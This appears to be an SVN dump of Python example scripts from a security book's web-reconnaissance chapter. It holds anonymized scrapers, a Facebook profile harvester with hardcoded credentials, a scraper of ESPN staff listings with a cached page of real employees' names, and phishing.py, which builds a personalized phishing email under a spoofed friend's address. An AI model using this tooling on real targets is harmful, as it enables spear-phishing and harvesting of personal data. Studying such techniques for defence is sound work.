| 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 1218 266 | 267 | parse_webpage.py 268 | file 269 | 4 270 | 271 | 272 | 273 | 2012-01-16T18:16:58.000000Z 274 | 0d412fdfcf9929d54c4cc74ab76c95a9 275 | 2012-01-19T02:51:19.072734Z 276 | 4 277 | 278 | 279 | 280 | 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 355 300 | 301 | twitter.pyc 302 | file 303 | 3 304 | 305 | 306 | 307 | 2012-01-15T20:51:23.000000Z 308 | 0c6286675eb89238cb6a2edb4257952d 309 | 2012-01-15T21:34:36.879321Z 310 | 3 311 | 312 | has-props 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 1018 334 | 335 | basic_usage.py 336 | file 337 | 3 338 | 339 | 340 | 341 | 2012-01-13T00:58:35.000000Z 342 | ff17357f5da0ac0ae52bf5560e93ea0c 343 | 2012-01-15T21:34:36.879321Z 344 | 3 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | 359 | 360 | 361 | 362 | 363 | 364 | 365 | 366 | 367 | 346 368 | 369 | .pydevproject 370 | file 371 | 372 | 373 | 374 | 375 | 2012-01-11T02:00:22.000000Z 376 | a612188e29a89bcb72e119d50c0e27e4 377 | 2012-01-13T00:46:35.653694Z 378 | 2 379 | 380 | 381 | 382 | 383 | 384 | 385 | 386 | 387 | 388 | 389 | 390 | 391 | 392 | 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 304 402 | 403 | create_browser.py 404 | file 405 | 3 406 | 407 | 408 | 409 | 2012-01-13T21:01:23.000000Z 410 | eab6f751e3149d6ef944d6a80f696bdb 411 | 2012-01-15T21:34:36.879321Z 412 | 3 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | 434 | 435 | 780 436 | 437 | violent_person.py 438 | file 439 | 9 440 | 441 | 442 | 443 | 2012-02-17T16:37:16.000000Z 444 | ef40896f710d6828142cffd049404607 445 | 2012-02-17T17:04:16.640470Z 446 | 9 447 | 448 | 449 | 450 | 451 | 452 | 453 | 454 | 455 | 456 | 457 | 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 3867 470 | 471 | phishing.py 472 | file 473 | 7 474 | 475 | 476 | 477 | 2012-01-23T02:55:21.000000Z 478 | d5ef9aaffb5ab26868d94c7038b0d3ad 479 | 2012-01-25T02:33:22.614031Z 480 | 7 481 | 482 | 483 | 484 | 485 | 486 | 487 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 2309 504 | 505 | facebook.py 506 | file 507 | 9 508 | 509 | 510 | 511 | 2012-02-17T16:44:26.000000Z 512 | b0eeb7af2b1281c36d3fba4686dab10b 513 | 2012-02-17T17:04:16.640470Z 514 | 9 515 | 516 | 517 | 518 | 519 | 520 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | 533 | 534 | 535 | 536 | 537 | 1811 538 | 539 | violent_person.pyc 540 | file 541 | 7 542 | 543 | 544 | 545 | 2012-01-23T02:27:12.000000Z 546 | 3abfeed5e4128130f9ff48d3d9e7dc94 547 | 2012-01-25T02:33:22.614031Z 548 | 7 549 | 550 | has-props 551 | 552 | 553 | 554 | 555 | 556 | 557 | 558 | 559 | 560 | 561 | 562 | 563 | 564 | 565 | 566 | 567 | 568 | 569 | 570 | 571 | 3865 572 | 573 | urlopen_wget.py 574 | file 575 | 3 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 594 | 595 | deleted 596 | 597 | google.py 598 | file 599 | 9 600 | 601 | 602 | 603 | 2012-02-17T16:08:25.000000Z 604 | 95605be850e62690fdf9c9164bb9ac3b 605 | 2012-02-17T17:04:16.640470Z 606 | 9 607 | 608 | 609 | 610 | 611 | 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 902 630 | 631 | quarkbase.py 632 | file 633 | 9 634 | 635 | 636 | 637 | 2012-02-17T16:36:43.000000Z 638 | ade0d21dbe2f81432cf9665c4c1902fa 639 | 2012-02-17T17:04:16.640470Z 640 | 9 641 | 642 | 643 | 644 | 645 | 646 | 647 | 648 | 649 | 650 | 651 | 652 | 653 | 654 | 655 | 656 | 657 | 658 | 659 | 660 | 661 | 662 | 663 | 1760 664 | 665 | test.py 666 | file 667 | 5 668 | 669 | 670 | 671 | 2012-01-16T21:47:24.000000Z 672 | 215a997111a595751960d8f2f7154221 673 | 2012-01-21T18:08:31.520353Z 674 | 5 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 684 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 237 698 | 699 | temp.html 700 | file 701 | 5 702 | 703 | 704 | 705 | 2012-01-21T17:05:38.064753Z 706 | 420fec360a1ea4e779790f182bb4f3d4 707 | 2012-01-21T18:08:31.520353Z 708 | 5 709 | 710 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | 719 | 720 | 721 | 722 | 723 | 724 | 725 | 726 | 727 | 728 | 729 | 730 | 731 | 19721 732 | 733 | violent_browser.py 734 | file 735 | 6 736 | 737 | 738 | 739 | 2012-01-21T21:18:59.000000Z 740 | 8232f2962940fea04c86c24b11d5df1a 741 | 2012-01-22T23:19:49.427256Z 742 | 6 743 | 744 | 745 | 746 | 747 | 748 | 749 | 750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 1574 766 | 767 | web_common.py 768 | file 769 | 3 770 | 771 | 772 | 773 | 2012-01-15T19:47:23.205805Z 774 | b3caddbad041a94afa7dddfa0e982332 775 | 2012-01-15T21:34:36.879321Z 776 | 3 777 | 778 | 779 | 780 | 781 | 782 | 783 | 784 | 785 | 786 | 787 | 788 | 789 | 790 | 791 | 792 | 793 | 794 | 795 | 796 | 797 | 798 | 799 | 1315 800 | 801 | simple_scrape.py 802 | file 803 | 9 804 | 805 | 806 | 807 | 2012-02-17T15:57:44.000000Z 808 | be4c2ff462b206f4cb28557d8a554add 809 | 2012-02-17T17:04:16.640470Z 810 | 9 811 | 812 | 813 | 814 | 815 | 816 | 817 | 818 | 819 | 820 | 821 | 822 | 823 | 824 | 825 | 826 | 827 | 828 | 829 | 830 | 831 | 832 | 833 | 2931 834 | 835 | violent_browser.pyc 836 | file 837 | 6 838 | 839 | 840 | 841 | 2012-01-21T21:20:13.000000Z 842 | 9feea90b28cf0de71b0c7e52bd45dc26 843 | 2012-01-22T23:19:49.427256Z 844 | 6 845 | 846 | has-props 847 | 848 | 849 | 850 | 851 | 852 | 853 | 854 | 855 | 856 | 857 | 858 | 859 | 860 | 861 | 862 | 863 | 864 | 865 | 866 | 867 | 2371 868 | 869 | violent_email.py 870 | file 871 | 7 872 | 873 | 874 | 875 | 2012-01-23T02:06:21.000000Z 876 | 70c5db2fa0abf2ed4a93e2bb56951c4f 877 | 2012-01-25T02:33:22.614031Z 878 | 7 879 | 880 | 881 | 882 | 883 | 884 | 885 | 886 | 887 | 888 | 889 | 890 | 891 | 892 | 893 | 894 | 895 | 896 | 897 | 898 | 899 | 900 | 901 | 700 902 | 903 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/twitter.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/violent_browser.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/violent_email.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/violent_person.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/web_common.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/.project.svn-base: -------------------------------------------------------------------------------- 1 | 2 | 3 | book_scripts 4 | 5 | 6 | 7 | 8 | 9 | org.python.pydev.PyDevBuilder 10 | 11 | 12 | 13 | 14 | 15 | org.python.pydev.pythonNature 16 | 17 | 18 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/.pydevproject.svn-base: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Default 6 | python 2.7 7 | 8 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/anon_scrape.py.svn-base: -------------------------------------------------------------------------------- 1 | '''import mechanize, cookielib, urlparse, os, re, random, time 2 | 3 | def create_browser(): 4 | #Create the basic browser object 5 | browser = mechanize.Browser() 6 | #Create a handler for cookies, this class can load and save cookies 7 | cj = cookielib.LWPCookieJar() 8 | #Add it to browser 9 | browser.set_cookiejar(cj) 10 | #Ignore robots.txt, so we don't miss anything while scraping 11 | browser.set_handle_robots(False) 12 | #Allow refresh redirections 13 | browser.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 14 | #Add a user agent header to our browser 15 | browser.addheaders = [('User-agent', ('Mozilla/5.0 (compatible; MSIE 9.0;' 16 | 'Windows NT 6.1; Trident/5.0)'))] 17 | return browser 18 | ''' 19 | class Violent_Scraper(): 20 | def __init__(self, browser = None, mirror_dir = None, proxies = [], user_agents = []): 21 | #If browser is passed in, use that, otherwise make a new one 22 | self.browser = browser if browser else create_browser() 23 | self.dir = mirror_dir if mirror_dir else '' 24 | self.proxies = proxies 25 | self.user_agents = user_agents + ['Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 26 | 'Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)', 27 | 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.5004; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 28 | 'Mozilla/5.0 (X11; U; Linux; de-DE) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.8.0', 29 | 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Avant Browser; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)', 30 | 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en; rv:1.9.2.14pre) Gecko/20101212 Camino/2.1a1pre (like Firefox/3.6.14pre)', 31 | 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0', 32 | 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko, Safari) Cheshire/1.0.UNOFFICIAL', 33 | 'Mozilla/5.0 (Windows; U; Windows NT 6.1; x64; fr; rv:1.9.2.13) Gecko/20101203 Firebird/3.6.13', 34 | 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'] 35 | 36 | def anonymize(self): 37 | #If not using a proxy, do nothing 38 | if self.proxies: 39 | #Random number between 0 and the length of self.proxies 40 | index = random.randrange(0, len(self.proxies) ) 41 | #Set self.browser's proxy to the randomly chosen proxy 42 | self.browser.set_proxy( {'http': self.proxies[index]} ) 43 | 44 | #Randomly choose a new user agent string 45 | index = random.randrange(0, len(self.user_agents)) 46 | self.browser.addheaders = self.user_agents[index] 47 | 48 | #Clear cookies 49 | cj = cookielib.LWPCookieJar() 50 | browser.set_cookiejar(cj) 51 | 52 | time.sleep(60) 53 | ''' 54 | def save_page(self, html, dst): 55 | dst = dst.lstrip('http://') 56 | f = open(dst, 'w') 57 | f.write(html) 58 | f.close() 59 | 60 | def scrape(self, website, visited = []): 61 | self.anonymize() 62 | 63 | #Get the hostname of the website 64 | hostname = urlparse.urlparse(website).hostname 65 | 66 | save_file_path = os.path.join(self.dir, website+'.html') 67 | source = self.browser.open(website).read() 68 | self.save_page(source, save_file_path) 69 | 70 | #Mechanize method that can except a regex 71 | #We pass in hostname so we don't get sent outside the site 72 | for link in self.browser.links(url_regex = hostname): 73 | if link not in visited: 74 | #Scrae the page, and add to visited 75 | visited += self.scrape(link, visited) 76 | 77 | #Return visited for trackign purposes 78 | return visited 79 | 80 | v = Violent_Scraper() 81 | v.scrape('http://www.espn.com')''' -------------------------------------------------------------------------------- /CH6/.svn/text-base/basic_usage.py.svn-base: -------------------------------------------------------------------------------- 1 | import urllib2, mechanize 2 | 3 | #Open the page 4 | page = urllib2.urlopen('violentpython.org') 5 | #source_code will be a list of strings containing the lines of source code 6 | source_code = page.read() 7 | 8 | #Create a browser object 9 | browser = mechanize.Browser() 10 | #Open the page 11 | page = browser.open('violentpython.org') 12 | #View the source code 13 | source_code = page.read() -------------------------------------------------------------------------------- /CH6/.svn/text-base/create_browser.py.svn-base: -------------------------------------------------------------------------------- 1 | import mechanize, cookielib, urlparse, os 2 | 3 | def create_browser(): 4 | #Create the basic browser object 5 | browser = mechanize.Browser() 6 | #Create a handler for cookies, this class can load and save cookies 7 | cj = cookielib.LWPCookieJar() 8 | #Add it to browser 9 | browser.set_cookiejar(cj) 10 | #Ignore robots.txt, so we don't miss anything while scraping 11 | browser.set_handle_robots(False) 12 | #Allow refresh redirections 13 | browser.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 14 | #Add a user agent header to our browser 15 | browser.addheaders = [('User-agent', ('Mozilla/5.0 (compatible; MSIE 9.0;' 16 | 'Windows NT 6.1; Trident/5.0)'))] 17 | return browser -------------------------------------------------------------------------------- /CH6/.svn/text-base/facebook.py.svn-base: -------------------------------------------------------------------------------- 1 | from violent_browser import Violent_Browser 2 | from BeautifulSoup import BeautifulSoup 3 | import re 4 | 5 | class Facebook(): 6 | def __init__(self, user_name, password): 7 | self._browser = self.login(user_name, password) 8 | pass 9 | 10 | def login(self, user_name, password): 11 | browser = Violent_Browser() 12 | browser.open('http://www.facebook.com') 13 | 14 | #The first form is the login form 15 | browser.select_form(nr = 0) 16 | 17 | #Add our login details 18 | browser.form['email']= user_name 19 | browser.form['pass']= password 20 | 21 | #Submit login 22 | browser.submit() 23 | #Return the browser that is now logged in for use 24 | return browser 25 | 26 | def get_information(self): 27 | profile_page = self._browser.find_link(url_regex="profile") 28 | page = self._browser.follow_link(profile_page).read() 29 | 30 | #Lives in follows pattern ["Lives in"][gibberish][link][Name of city][closing of link] 31 | lives_in = re.compile('Lives in .*?">(.*?)').findall(page) 32 | #If found, use that location, else use error string 33 | self.lives_in = lives_in[0] if lives_in else 'Location not listed' 34 | 35 | #Check if in a relationship 36 | relationship_status_regex = re.compile('In a relationship').search(page) 37 | self.status = True if relationship_status_regex else False 38 | 39 | friends = {} 40 | #Find friends 41 | friends_on_page = re.compile('alt="(.*?)"').findall(page) 42 | for friend in friends_on_page: 43 | if not friends.has_key(friend): 44 | friends[friend] = True 45 | del friends[''] 46 | self.friends = friends.keys() 47 | 48 | fb = Facebook('insanepyro07@yahoo.com', 'fr0$7yfacebookp@$$w0rd') 49 | fb.get_information() 50 | print fb.lives_in 51 | print fb.status 52 | print fb.friends -------------------------------------------------------------------------------- /CH6/.svn/text-base/google.py.svn-base: -------------------------------------------------------------------------------- 1 | from violent_browser import Violent_Browser 2 | import json, urllib 3 | 4 | class Google_Result(): 5 | def __init__(self, title, text, url): 6 | self.title = title 7 | self.text = text 8 | self.url = url 9 | 10 | #Will print the title of the result if someone calls print on the class 11 | def __repr__(self): 12 | return self.title 13 | 14 | def google(search_term): 15 | vb = Violent_Browser() 16 | 17 | search_term = urllib.quote_plus(search_term) 18 | response = vb.open('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=' + search_term) 19 | 20 | objects = json.load(response) 21 | 22 | results = [] 23 | 24 | for result in objects['responseData']['results']: 25 | url = result['url'] 26 | title = result['titleNoFormatting'] 27 | text = result['content'] 28 | 29 | new_gr = Google_Result(title, text, url) 30 | results.append(new_gr) 31 | 32 | return results 33 | 34 | print google('Black Cell') 35 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/parse_webpage.py.svn-base: -------------------------------------------------------------------------------- 1 | import re 2 | from BeautifulSoup import BeautifulSoup 3 | 4 | link_finder = re.compile('href="(.*?)"') 5 | links = link_finder.findall(source) 6 | for link in links: 7 | print link 8 | 9 | #Parse with beautiful soup 10 | #Create a soup 11 | soup = BeautifulSoup(source) 12 | #Get all links 13 | links = soup.findAll(name='a') 14 | for link in links: 15 | if link.has_key('href'): 16 | print link['href'] -------------------------------------------------------------------------------- /CH6/.svn/text-base/phishing.py.svn-base: -------------------------------------------------------------------------------- 1 | import violent_email, violent_person, random, re 2 | 3 | #Create an arbitrary person with our information in it 4 | person = violent_person.Violent_Person('Violent', 'Python', 'hacker', {'Twitter': 'ViolentPython'}) 5 | person.location = 'Dr Evil Island, Pacific Ocean' 6 | person.twitter_mentions = ['AggressiveExploits'] 7 | person.websites = ['http://www.secretsofinterest.com'] 8 | person.relationship = False 9 | person.friends = ['Aggressive Exploits', 'Sally Fourth'] 10 | person.links = [('Violent Pythonic Widgets Inc Loses a Trillion Dollars', 'www.awesomenewsaboutbadguys.com'), 11 | ('Violent Pythonic Widgets Inc Sues Everyone', 'www.badnewshackers.com') ] 12 | 13 | client = violent_email.Email_Client('133.713.371.337') 14 | 15 | def create_subject(person): 16 | subject = 'All of our ' 17 | if person.relationship: subject += 'committed friends ' 18 | else: subject += 'single friends ' 19 | 20 | subject += 'think this website about ' + person.job + "'s is awesome!" 21 | return subject 22 | 23 | def create_sender(person): 24 | index = random.randrange(0, len(person.friends)) 25 | name = person.friends[index] 26 | name = re.sub(' ', '_', name) 27 | name = name.lower() 28 | 29 | return name + '@legitimate_compay.com' 30 | 31 | def create_body(person): 32 | message = 'Just the other day I was browsing ' 33 | 34 | if len(person.websites) > 0: 35 | index = random.randrange(0, len(person.websites)) 36 | message += person.websites[index] + ' ' 37 | else: 38 | message += ' the amazing website you mentioned ' 39 | 40 | message += 'and I came across a recent story. It mentioned that ' 41 | 42 | if len(person.links) > 0: 43 | index = random.randrange(0, len(person.links)) 44 | message += person.links[index][0] + '. ' 45 | else: 46 | ' your company hit a rough spot recently. ' 47 | 48 | message += "What's the deal with that?!? Well, anyway I saw more information " 49 | 50 | if person.location: 51 | message += "about how it affects people in " + person.location + ' ' 52 | 53 | message += ' at this awesome resource. ' 54 | message += '.' 55 | message += 'Hope you are doing ok!' 56 | 57 | return message 58 | 59 | subject = create_subject(person) 60 | sender = create_sender(person) 61 | body = create_body(person) 62 | client.send_email('violentpython@violentpythonwidgets.com', sender, subject, body) -------------------------------------------------------------------------------- /CH6/.svn/text-base/quarkbase.py.svn-base: -------------------------------------------------------------------------------- 1 | import violent_browser, re 2 | from BeautifulSoup import BeautifulSoup 3 | 4 | #A basic class to store information 5 | class Person(): 6 | def __init__(self, first_name, last_name, job = '', social_media = {} ): 7 | self.first_name = first_name 8 | self.last_name = last_name 9 | self.job = job 10 | self.social_media = social_media 11 | 12 | def __repr__(self): 13 | return self.first_name + ' ' + self.last_name + ' has job ' + self.job 14 | 15 | 16 | def search_quark(page): 17 | soup = BeautifulSoup(page) 18 | soup.prettify() 19 | #All people are inside of cells with class attribute 'peopletd' 20 | people_cells = soup.findAll('td', attrs = {'class' : 'peopletd'} ) 21 | results = [] 22 | for cell in people_cells: 23 | #Find person's name using BeautifulSoup's find method 24 | name = cell.find('b').string 25 | first_name = name.split(' ')[0] 26 | last_name = name.split(' ')[1] 27 | 28 | #Find person's job using regular expression based on page formatting 29 | job = re.compile('  (.*?)\n').findall( cell.prettify() ) 30 | job = job[0] if job else "No career found" 31 | 32 | #Dictionary to hold social media information 33 | social_media = {} 34 | #Find all links 35 | for link in cell.findAll('a'): 36 | #Create new key/value pairs in dictionary, key is found using regex 37 | media_name = re.compile('">(.*?)').findall( str(link) )[0] 38 | social_media[media_name] = link['href'] 39 | 40 | results.append(new_person) 41 | new_person = Person(first_name, last_name, job, social_media) 42 | return results 43 | 44 | browser = violent_browser.Violent_Browser() 45 | #Get first page of results 46 | page = browser.open('http://www.quarkbase.com/people/' + 'espn.com').read() 47 | 48 | print search_quark(page) -------------------------------------------------------------------------------- /CH6/.svn/text-base/simple_scrape.py.svn-base: -------------------------------------------------------------------------------- 1 | import violent_browser, urlparse, os, re 2 | from BeautifulSoup import BeautifulSoup 3 | 4 | class Violent_Mirror(): 5 | def __init__(self, mirror_dir = None): 6 | #If browser is passed in, use that, otherwise make a new one 7 | self.browser = violent_browser.Violent_Browser() 8 | self.dir = mirror_dir if mirror_dir else '' 9 | 10 | def save_page(self, html, dst): 11 | f = open(dst, 'w') 12 | f.write(html) 13 | f.close() 14 | 15 | def rewrite_links(self, html, hostname): 16 | soup = BeautifulSoup(html) 17 | for link in soup.findAll(name='a'): 18 | #If this is an href link, and hostname is found in the link 19 | if link.has_key('href') and re.search(hostname, link['href']): 20 | #Replace '/' with '_' like we do when saving to disk 21 | link['href'] = link['href'].replace('/', '_') + '.html' 22 | #Change http:__ to file:// for a valid link 23 | link['href'] = link['href'].replace('http:__', 'file://') 24 | 25 | return soup.prettify() 26 | 27 | def get_imgs(self, html): 28 | soup = BeautifulSoup(html) 29 | #Find all 'img' html tags 30 | image_tags = soup.findAll('img') 31 | 32 | for image in image_tags: 33 | #Create the filename 34 | filename = image['src'].lstrip('http://') 35 | filename = os.path.join(self.dir, filename.replace('/', '_')) 36 | 37 | data = self.browser.open(image['src']).read() 38 | 39 | save = open(filename, 'wb') 40 | save.write(data) 41 | save.close() 42 | 43 | image['src'] = 'file://' + filename 44 | return soup.prettify() 45 | 46 | def mirror(self, website, visited = []): 47 | #Get the hostname of the website 48 | hostname = urlparse.urlparse(website).hostname 49 | filename = website.lstrip('http://') 50 | filename = filename.replace('/', '_') + '.html' 51 | 52 | save_file_path = os.path.join(self.dir, filename) 53 | response = self.browser.open(website) 54 | source = response.read() 55 | 56 | #Rewrite the links in source 57 | source = self.rewrite_links(source, hostname) 58 | source = self.get_imgs(source) 59 | 60 | self.save_page(source, save_file_path) 61 | 62 | #Return to page after viewing images 63 | self.browser.open(website) 64 | 65 | #Mechanize method that can except a regex 66 | #We pass in hostname so we don't get sent outside the site 67 | try: 68 | for link in self.browser.links(url_regex = hostname): 69 | if link.url not in visited: 70 | visited.append(link.url) 71 | #Scrape the page, and add to visited 72 | visited += self.mirror(link.url, visited) 73 | except Exception, e: 74 | pass 75 | 76 | #Return visited for trackign purposes 77 | return visited 78 | 79 | v = Violent_Mirror('/home/frosty') 80 | v.mirror('http://www.violentpython.org') -------------------------------------------------------------------------------- /CH6/.svn/text-base/temp.html.svn-base: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Espn People | Quarkbase 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |
18 |
19 |
20 |
21 | Quarkbase logo 22 |
Easier way to find website information
23 |
24 |
25 |
26 |
27 | 28 | 29 |
30 | 33 | 34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 | 47 |
48 |

49 | People associated with
Espn.com 50 | 51 | 52 |

53 |
54 |
55 |
56 |
57 |
58 | Displaying results 1 - 20 of 1082 59 |
60 | 61 | 62 | 65 | 68 | 69 | 70 | 71 | 74 | 77 | 78 | 79 | 80 | 83 | 86 | 87 | 88 | 89 | 92 | 95 | 96 | 97 | 98 | 101 | 104 | 105 | 106 | 107 | 110 | 113 | 114 | 115 | 116 | 119 | 122 | 123 | 124 | 125 | 128 | 131 | 132 | 133 | 134 | 137 | 140 | 141 | 142 | 143 | 146 | 149 | 150 | 151 | 152 | 155 | 158 | 159 | 160 | 161 | 164 | 167 | 168 | 169 | 170 | 173 | 176 | 177 | 178 | 179 | 182 | 185 | 186 | 187 | 188 | 191 | 194 | 195 | 196 | 197 | 200 | 203 | 204 | 205 | 206 | 209 | 212 | 213 | 214 | 215 | 218 | 221 | 222 | 223 | 224 | 227 | 230 | 231 | 232 | 233 | 236 | 239 | 240 | 241 | 242 |
Russell Wolff,  Executive Vice President and Managing Director
63 | Profile: Linkedin   Lead411   Zoominfo
EVP, International at ESPN
64 |
66 |
russell wolff
67 |
Lynne Frank,  Managing Director
72 | Profile: Lead411   Zoominfo
Network), cricket website Cricinfo and rugby site scrum.com.Frank is also responsible for the operations of ESPN Classic Sport, ESPN channels in ...
73 |
75 |
76 |
Roch Pellerin,  Managing Director ESPN Classic Sport
81 | Profile: Lead411   Zoominfo
Managing Director at ESPN, Inc. ... ESPN, Inc.
82 |
84 |
85 |
Lino Garcia,  General Manager ESPN Deportes
90 | Profile: Lead411   Zoominfo
GM, ESPN Deportes ESPN | "This deal underscores ESPN Deportes' commitment to soccer fans in the U.S.," said Lino Garcia, general manager, ESPN ...
91 |
93 |
lino garcia
94 |
Todd Bartley,  General Manager ESPN Radio
99 | Profile: Lead411   Zoominfo
AM 1230, an ESPN Radio affiliate, has moved to Minerva, Ohio, to assume responsibilities at a radio station there. Bartley, 28, launched the ESPN ...
100 |
102 |
103 |
Peter Dits,  General Manager ESPN Radio
108 | Profile: Lead411
109 |
111 |
112 |
Dominic Minniti,  General Manager ESPN Zone
117 | Profile: Lead411
118 |
120 |
121 |
Eric Levitt,  General Manager ESPN Zone
126 | Profile: Lead411
127 |
129 |
130 |
Gerardo Casanova,  General Manager ESPN
135 | Profile: Lead411   Zoominfo
in 2007," said Gerardo Casanova, general manager, ESPN Mexico. | ESPN Names Gerardo Casanova as General Manager of its Mexico Operations | ESPN ...
136 |
138 |
139 |
Oscar Ramos,  Senior Director and General Manager ESPN Deportes Radio
144 | Profile: Lead411   Zoominfo
Senior Director, General Manager at ESPN Deportes Radio ... ESPN Deportes Radio
145 |
147 |
oscar ramos
148 |
Rick Alessandri,  Senior Vice President and General Manager
153 | Profile: Linkedin   Zoominfo
Senior Vice President at ESPN
154 |
156 |
rick alessandri
157 |
Pete Derzis,  Senior Vice President and General Manager
162 | Profile: Lead411   Zoominfo
, Senior Vice President of ESPN Regional. "In conjunction with ISP, this opportunity will continue to build on the outstanding relationships ESPN ...
163 |
165 |
166 |
John Kosner,  Senior Vice President and General Manager ESPN New Media
171 | Profile: Lead411   Twitter
GM, ESPN Digital Media
172 |
174 |
175 |
Mike Morrison,  Vice President and General Manager
180 | Profile: Linkedin   Lead411   Myspace   Zoominfo
Co-Editor at ESPN Sports Almanac
181 |
183 |
mike morrison
184 |
Steve Cipolla,  Vice President and General Manager ESPN Consumer Products
189 | Profile: Linkedin   Lead411   Zoominfo
VP/GM at ESPN
190 |
192 |
193 |
Tom Ricks,  Vice President and General Manager ESPN Outdoors & BASS
198 | Profile: Linkedin   Lead411   Zoominfo
Vice President & General Mgr, ESPN Outdoors / BASS ... Vice President & General Mgr at ESPN Outdoors / BASS
199 |
201 |
tom ricks
202 |
T.J. Quinn,  Washington Nationals General Manager Jim Bowden and Special Assistant Jose Rijo
207 | Profile: Lead411   Zoominfo
1. Mark Fainaru-Wada and T.J. Quinn, ESPN reporters:To bolster its fledgling multi-platform investigative unit, ESPN made a pair of splashy hires ...
208 |
210 |
211 |
Justin Lloyd,  West Coast Regional General Manager of Operations ESPN Zone
216 | Profile: Lead411   Zoominfo
Lloyd, ESPN Zone general manager, is optimistic that Thursday night will be great for business.But economically, this week hasn't shined brightly ...
217 |
219 |
220 |
Jarrod Rudolph,  RealGM Columnist
225 | Profile: Lead411
226 |
228 |
229 |
Craig Shapiro,  Segment Producer
234 | Profile: Lead411
235 |
237 |
238 |
243 |
244 |
245 | Prev • Next ▸
Displaying results 1 - 20 of 1082
246 |
247 |
248 |
249 | 250 |
251 | 253 |
254 | 255 | 256 |
257 |
258 |
259 |
260 |
261 |
Sponsored Links
262 |
263 | 271 |
274 |
275 |
276 | 277 |
278 |
279 | 280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 | 310 | 311 | 315 | 319 | 320 | 321 | 322 | 323 | 336 |
337 |
